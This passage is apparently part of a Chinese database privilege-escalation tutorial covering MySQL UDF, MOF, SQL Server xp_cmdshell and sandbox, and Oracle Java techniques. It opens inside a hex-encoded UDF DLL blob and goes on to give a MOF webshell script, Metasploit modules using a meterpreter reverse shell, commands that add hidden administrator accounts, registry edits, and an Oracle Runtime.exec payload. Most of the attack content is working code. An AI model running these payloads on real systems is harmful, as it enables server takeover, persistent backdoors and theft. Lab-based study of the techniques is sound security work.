B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";


 }




 ?>

        2. 以下是要过本地限制连接 mysql 数据库显示并执行的 php 代码:

          <?php
$host = 'localhost';
$username = 'root';
$password = '123456'; // 注意:出于安全考虑,避免在代码中明文存储密码
$conn = new mysqli($host, $username, $password);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
$conn->set_charset("utf8mb4");

$response = [];

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    $action = $_POST['action'];
    $database = $_POST['database'];
    if ($database) {
        $conn->select_db($database);
    }

    switch ($action) {
        case 'getTables':
            $sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";
            $result = $conn->query($sql);
            while ($row = $result->fetch_assoc()) {
                $response[] = $row['table_name'];
            }
            break;
        case 'getColumns':
            $table = $_POST['table'];
            $sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";
            $result = $conn->query($sql);
            while ($row = $result->fetch_assoc()) {
                $response[] = $row['column_name'];
            }
            break;
        case 'getRows':
            $table = $_POST['table'];
            $column = $_POST['column'];
            $sql = "SELECT `$column` FROM `$table`";
            $result = $conn->query($sql);
            while ($row = $result->fetch_assoc()) {
                $response[] = $row[$column];
            }
            break;
        case 'executeSQL':
            $sql = $_POST['sql'];
            $result = $conn->query($sql);
            if ($result === true) {
                $response['success'] = "执行成功";
            } else if ($result) {
                while ($row = $result->fetch_assoc()) {
                    $response[] = $row;
                }
            } else {
                $response['error'] = "错误: " . $conn->error;
            }
            break;
    }

    $conn->close();
    echo json_encode($response);
    exit;
}

$databases = [];
$result = $conn->query("SHOW DATABASES");
while ($row = $result->fetch_assoc()) {
    $databases[] = $row['Database'];
}
$conn->close();
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>CongSec</title>
<style>
    body { font-family: Arial, sans-serif; }
    .container {
        display: flex;
        flex-wrap: wrap;  /* 允许子项在必要时换行 */
        align-items: center; /* 中心对齐子项 */
        padding: 10px;
    }
    button {
        margin: 5px;
        padding: 8px 16px;
        background-color: #4CAF50;
        color: white;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        min-width: 120px; /* 最小宽度 */
        white-space: nowrap; /* 防止文字在按钮内换行 */
    }
    button:hover {
        background-color: #45a049;
    }
    div {
        margin: 5px;
    }
    textarea {
        width: 95%; /* 调整宽度以适应屏幕 */
        height: 150px; /* 调整高度 */
        margin: 5px;
    }
</style>
<script>
function fetchTables(database) {
    fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: 'action=getTables&database=' + encodeURIComponent(database)
    })
    .then(response => response.json())
    .then(data => {
        const container = document.getElementById('tables');
        container.innerHTML = '';
        data.forEach(table => {
            const div = document.createElement('div');
            const button = document.createElement('button');
            button.textContent = table;
            button.onclick = () => fetchColumns(database, table);
            div.appendChild(button);
            container.appendChild(div);
        });
    });
}

function fetchColumns(database, table) {
    fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)
    })
    .then(response => response.json())
    .then(data => {
        const container = document.getElementById('columns');
        container.innerHTML = '';
        data.forEach(column => {
            const div = document.createElement('div');
            const button = document.createElement('button');
            button.textContent = column;
            button.onclick = () => fetchRows(database, table, column);
            div.appendChild(button);
            container.appendChild(div);
        });
    });
}

function fetchRows(database, table, column) {
    fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)
    })
    .then(response => response.json())
    .then(data => {
        const container = document.getElementById('rows');
        container.innerHTML = '';
        data.forEach(value => {
            const div = document.createElement('div');
            div.textContent = value;
            container.appendChild(div);
        });
    });
}

function executeSQL() {
    const sql = document.getElementById('sqlText').value;
    fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: 'action=executeSQL&sql=' + encodeURIComponent(sql)
    })
    .then(response => response.json())
    .then(data => {
        const container = document.getElementById('sqlResult');
        container.innerHTML = '';
        if (data.error) {
            container.textContent = data.error;
        } else if (data.success) {
            container.textContent = data.success;
        } else {
            data.forEach(row => {
                const div = document.createElement('div');
                div.textContent = JSON.stringify(row);
                container.appendChild(div);
            });
        }
    });
}
</script>
</head>
<body>
<h1>选择数据库</h1>
<div class="container" id="databases">
<?php foreach ($databases as $db): ?>
    <button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
<?php endforeach; ?>
</div>
<h2>表信息</h2>
<div class="container" id="tables"></div>
<h2>列信息</h2>
<div class="container" id="columns"></div>
<h2>字段信息</h2>
<div class="container" id="rows"></div>
<h2>执行SQL</h2>
<div class="container" id="executeSQL">
    <textarea id="sqlText"></textarea>
    <button onclick="executeSQL()">执行</button>
</div>
<h2>SQL执行结果</h2>
<div class="container" id="sqlResult"></div>
</body>
</html>

        3. 访问该脚本,输入数据库的账号和密码

          1. image

        4. 点击导出可以在目标主机的脚本提示目录中发现有 udf.dll 文件生成

          1. image
          2. image

        5. 将 dll 文件绑定 sys_eval 函数

          1. image

        6. 使用 select cmdshell('whoami') 命令可以看到是系统管理员身份

          1. image

      2. 只有数据库权限

        1. 条件

          1. 数据库外联开启

          2. secure-file-priv 没进行目录限制

            1. image

          3. 具有数据库帐号密码

        2. 复现

          1. 靶场:php 5.4.45 apche 2.4.23 iis win2008 mysql 5.5.53

          2. 首先我们要创建一个模拟可以外联的 sql 数据库来模拟攻击者已经获取了一个普通用户的数据库,以下是开启外联的步骤

            1. 在 mysql 数据库中主机为 % 即为容许所有主机来连接

              1. image

              2. 成功连接

                1. image
          3. msf 工具

            1. udf 生成的文件路径:

              1. mysql5.2 导出目录 c:/windows 或 system32

              2. mysql=5.2 导出安装目录/lib/plugin/

                1. image

              3. 安装目录

                1. image

            2. 通过 msf 工具生成 eqoWcBgh.dll 文件

              1.  use exploit/multi/mysql/mysql_udf_payload
 set payload windows/meterpreter/reverse_tcp 
 set password root
 set  rhosts 192.168.72.139
 run
              2. image

            3. 创建函数绑定 dll

              1. image

            4. 可以执行任意命令,拿下 webshell

              1. image

            5. 利用 msf 执行以下命令来创建启动项开机自启后门

              1.  use exploit/windows/mysql/mysql_start_up 
 set rhosts 192.168.72.139
 set username root
 set password root 
 run
              2. image
          4. sql 语句提权

            1. 在数据库中执行一下脚本即可拿到 system 权限

              1. image

    2. MOF 提权

      1. 前言

        1. mof 是 windows 系统的一个文件(在 c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了 mysql 的 root 权限了以后,然后使用 root 权限去执行我们上传的 mof。隔了一定时间以后这个 mof 就会被执行,这个 mof 当中有一段是 vbs 脚本,这个 vbs 大多数的是 cmd 的添加管理员用户的命令。【MOF 提权只能用于 Windows 系统提权,Linux 提权无法使用】
        2. xp_cmdshell 默认在 mssql2000 中是开启的,在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重修开启它。

      2. 条件

        1. mysql 有读写 C:/Windows/system32/wbem/mof 的权限
        2. secure-file-priv 参数不为 null
        3. 适用于 win2003 更早的版本

      3. 复现

        1. msf 工具

          1. 使用 msf 工具来提权即可

            1.  use exploit/windows/mysql/mysql_mof

 # 设置payload
 set payload windows/meterpreter/reverse_tcp

 # 设置目标 MySQL 的基础信息
 set rhosts 192.168.72.139
 set username root
 set password root
 run
        2. php 脚本提权

          1. 将脚本通过文件上传到可访问路径并用数据库账号和密码进行连接即可

            1. image

            2. 提权脚本:

              1.  <?php 
 $path="c:/ini.txt"; 
 session_start(); 
 if(!empty($_POST['submit'])){ 
 setcookie("connect"); 
 setcookie("connect[host]",$_POST['host']); 
 setcookie("connect[user]",$_POST['user']); 
 setcookie("connect[pass]",$_POST['pass']); 
 setcookie("connect[dbname]",$_POST['dbname']); 
 echo "<script>location.href='?action=connect'</script>"; 
 } 
 if(empty($_GET["action"])){ 
 ?> 

 <html> 
 <head><title>Win MOF Shell</title></head> 
 <body> 
 <form action="?action=connect" method="post"> 
 Host: 
 <input type="text" name="host" value="127.0.0.1"><br/> 
 User: 
 <input type="text" name="user" value="root"><br/> 
 Pass: 
 <input type="password" name="pass" value="root"><br/> 
 DB:   
 <input type="text" name="dbname" value="mysql"><br/> 
 <input type="submit" name="submit" value="Submit"><br/> 
 </form> 
 </body> 
 </html> 

 <?php 
 exit; 
 } 
 if ($_GET[action]=='connect') 
 { 
 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
 echo "<form action='' method='post'>"; 
 echo "Cmd:"; 
 echo "<input type='text' name='cmd' value='$strCmd'?>"; 
 echo "<br>"; 
 echo "<br>"; 
 echo "<input type='submit' value='Exploit'>"; 
 echo "</form>"; 
 echo "<form action='' method='post'>"; 
 echo "<input type='hidden' name='flag' value='flag'>"; 
 echo "<input type='submit'value=' Read  '>"; 
 echo "</form>"; 
 if (isset($_POST['cmd'])){ 
 $strCmd=$_POST['cmd']; 
 $cmdshell='cmd /c '.$strCmd.'>'.$path; 
 $mofname="c:/windows/system32/wbem/mof/system.mof"; 
 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 

 instance of __EventFilter as \$EventFilter 
 { 
   EventNamespace = \"Root\\\\\\\\Cimv2\"; 
   Name  = \"filtP2\"; 
   Query = \"Select * From __InstanceModificationEvent \" 
       \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
       \"And TargetInstance.Second = 5\"; 
   QueryLanguage = \"WQL\"; 
 }; 

 instance of ActiveScriptEventConsumer as \$Consumer 
 { 
   Name = \"consPCSV2\"; 
   ScriptingEngine = \"JScript\"; 
   ScriptText = 
   \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
 }; 

 instance of __FilterToConsumerBinding 
 { 
   Consumer = \$Consumer; 
   Filter = \$EventFilter; 
 };"; 
 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
 $sql1="select '$payload' into dumpfile '$mofname';"; 
 if(mysql_query($sql1)) 
   echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
 mysql_close($conn); 
 } 

 if(isset($_POST['flag'])) 
 { 
   $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
   $sql2="select load_file(\"".$path."\");"; 
   $result2=mysql_query($sql2); 
   $num=mysql_num_rows($result2); 
   while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
     echo "<hr/>"; 
     echo '<pre>'. $row[0].'</pre>'; 
   } 
   mysql_close($conn); 
 } 
 } 
 ?>

          2. 连接上即可执行任意命令

            1. image

          3. 接下来就进行权限的维持

            1. 创建隐藏用户 net user cong$ 12456 /add & net localgroup administrators cong$ /add
            2. image

    3. sqlserver 提权

      1. 前言

        1. 在 SQL Server 中,如果攻击者能够获取到 sa(系统管理员)账户的密码,那么他们实际上已经拥有了非常高的权限,因为 sa 账户是 SQL Server 中的超级用户,具有对数据库服务器的完全控制权。

        2. 关于执行操作系统命令的权限,特别是通过 SQL Server 的 xp_cmdshell 或其他机制,这取决于 SQL Server 的配置以及运行 SQL Server 的 Windows 操作系统账户的安全设置。

        3. 敏感文件名称

          1.  web.config 
 config.asp 
 conn.aspx 
 database.aspx

      2. 条件

        1. 服务器开启数据库服务
        2. 获取到最高权限用户密码
          (除 Access 数据库外,其他数据库基本都存在数据库提权的可能)

      3. xp_cmdshell 提权

        1. 复现

          1. 通过连接数据库执行数据库语句

            1. 开启 xp_cmdshell 命令

              1.  EXEC sp_configure 'show advanced options', 1
 RECONFIGURE;
 EXEC sp_configure 'xp_cmdshell', 1;
 RECONFIGURE;

            2. 执行命令语句 EXEC master.dbo.xp_cmdshell 'whoami' 即可

      4. 沙盒提权

        1. 介绍

          1. 沙盒模式是数据库的一种安全功能。在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的。利用前提需要 sqlserver sysadmin 账户服务器权限为 system(sqlserver2019 默认被降权为 mssql),服务器拥有 jet.oledb.4.0 驱动。

          2. 局限:(1)Microsoft.jet.oledb.4.0 一般在 32 位操作系统上才可以 (2)Windows 2008 以上 默认无 Access 数据库文件, 需要自己上传 sqlserver2015 默认禁用 Ad Hoc Distributed Queries,需要开启。

          3. 沙盒模式 SandBoxMode 参数含义(默认是 2)

            0:在任何所有者中禁止启用安全模式

            1 :为仅在允许范围内

            2 :必须在 access 模式下

            3:完全开启

        2. 复现

          1. 执行以下两条命令,启用高级选项

            1.  exec sp_configure 'show advanced options',1;reconfigure;
 exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

          2. 修改注册表

            1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

          3. 使用 SQL Server 的扩展存储过程 xp_regread 来从 Windows 注册表中读取 SandBoxMode 键的值。

            1. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';

          4. 执行系统命令

            1.  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')

          5. 恢复配置

            1.  exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
 exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
 exec sp_configure 'show advanced options',0;reconfigure;

Oracle 提权

  1. 靶场搭建

    1. 准备一个 oracle 环境的靶场

    2. 进入数据库 sqlplus/nolog

    3. 连接数据库用户 conn/as sysdba

    4. 创建一个低权限用户 create user test identified by test;

      1. image

    5. 还有获得有 java 权限

      1.  DECLARE

     POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;

     CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALL

  FILES>>', 'execute', 'ENABLED' FROM DUAL;

     BEGIN

     OPEN C1;

     FETCH C1 BULK COLLECT INTO POL;

     CLOSE C1;

     DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);

     END;

    /

    6. 如果想要执行任意代码的话还需要额外获得 java.lang.RuntimePermission 权限

      1.  DECLARE

     POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;

     CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',

 'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;

     BEGIN

     OPEN C1;

     FETCH C1 BULK COLLECT INTO POL;

     CLOSE C1;

     DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);

     END;

    /

  DECLARE

     POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;

     CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',

 'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;

     BEGIN

     OPEN C1;

     FETCH C1 BULK COLLECT INTO POL;

     CLOSE C1;

     DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);

     END;

    /

  2. 执行任意命令

    1. 复现

      1. 创建 java 包

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

      2. 获取 java 权限

